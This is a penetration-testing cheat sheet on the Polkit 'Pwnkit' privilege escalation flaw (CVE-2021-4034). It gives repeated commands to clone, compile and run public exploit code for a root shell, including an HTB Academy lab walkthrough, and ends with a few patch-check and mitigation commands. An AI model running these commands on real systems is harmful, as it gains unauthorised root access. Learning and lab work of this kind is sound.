πPolkit/Pwnkit
π― Overview
Polkit (PolicyKit) authorization service vulnerability CVE-2021-4034 "Pwnkit" allows local privilege escalation through pkexec memory corruption, affecting most Linux distributions.
π¨ CVE-2021-4034 (Pwnkit)
Vulnerability Details
Impact: Memory corruption in pkexec β immediate root shell
Affected: Most Linux distributions with polkit
Hidden: Over 10 years undetected (published Nov 2021)
Requirement: None - any local user can exploit
Version Check
# Check pkexec availability
which pkexec
pkexec --version
# Check polkit version
apt list --installed | grep polkit
rpm -qa | grep polkitπ Exploitation
Download and Compile Pwnkit
# Download exploit
git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034
# Compile exploit
gcc cve-2021-4034-poc.c -o poc
# Execute for immediate root
./poc
# Result: root shellAlternative Exploits
# Other Pwnkit implementations
git clone https://github.com/berdav/CVE-2021-4034.git
git clone https://github.com/joeammond/CVE-2021-4034-PoC.git
git clone https://github.com/Almorabea/Polkit-exploit.gitπ§ Manual Exploitation
Understanding the Vulnerability
# Normal pkexec usage
pkexec -u root id
# uid=0(root) gid=0(root) groups=0(root)
# Vulnerability in argument processing
# Memory corruption when pkexec processes argv[0]DIY Exploit (Advanced)
# Basic exploitation concept
# 1. Exploit argv[0] handling in pkexec
# 2. Trigger memory corruption
# 3. Control execution flow
# 4. Execute arbitrary code as rootπ Detection & Enumeration
Polkit Vulnerability Check
#!/bin/bash
echo "=== POLKIT/PWNKIT VULNERABILITY CHECK ==="
echo "[+] pkexec availability:"
which pkexec 2>/dev/null && echo "pkexec found - potential CVE-2021-4034"
echo "[+] Polkit version:"
apt list --installed 2>/dev/null | grep polkit
rpm -qa 2>/dev/null | grep polkit
echo "[+] pkexec version:"
pkexec --version 2>/dev/null
echo "[+] Quick vulnerability test:"
if which pkexec >/dev/null 2>&1; then
echo "[!] LIKELY VULNERABLE - pkexec present"
echo "Download: https://github.com/arthepsy/CVE-2021-4034.git"
fiSystem Information
# Check Linux distribution
cat /etc/os-release
cat /etc/lsb-release
# Check polkit service
systemctl status polkit
ps aux | grep polkitπ Quick Reference
Immediate Checks
# Check for pkexec
which pkexec
# Test basic functionality
pkexec -u root id # If works, likely vulnerable to CVE-2021-4034Emergency Exploitation
# Quick Pwnkit exploitation
git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034
gcc cve-2021-4034-poc.c -o poc
./poc # Immediate root shellHTB Academy Example
# 1. Connect to target
ssh htb-student@target
# 2. Check for pkexec
which pkexec
# 3. Download and compile Pwnkit
git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034
gcc cve-2021-4034-poc.c -o poc
# 4. Execute for root
./poc
# Get root shell
# 5. Read flag
cat /root/flag.txtβ οΈ Exploit Characteristics
Pwnkit Advantages
Universal impact - Works on most Linux distributions
No prerequisites - Any local user can exploit
Reliable exploitation - High success rate
Silent execution - Minimal system logs
Limitations
Compilation required - Need gcc on target or transfer binary
Patched systems - Fixed in updated polkit versions
Detection possible - Modern EDR may detect exploitation
π‘οΈ Defensive Measures
Patch Status Check
# Check if polkit is updated
apt list --upgradable | grep polkit
dnf check-update polkit
# Verify patch level
pkexec --version | grep -E "(0\.105|0\.117|0\.118|0\.119|0\.120)" # VulnerableMitigation Options
# Remove pkexec if not needed
sudo chmod 0755 /usr/bin/pkexec # Remove SUID
# Monitor pkexec usage
auditctl -w /usr/bin/pkexec -p x -k pwnkit_usagePwnkit (CVE-2021-4034) represents one of the most significant Linux privilege escalation vulnerabilities - any local user can exploit polkit's pkexec for immediate root access on unpatched systems.
Last updated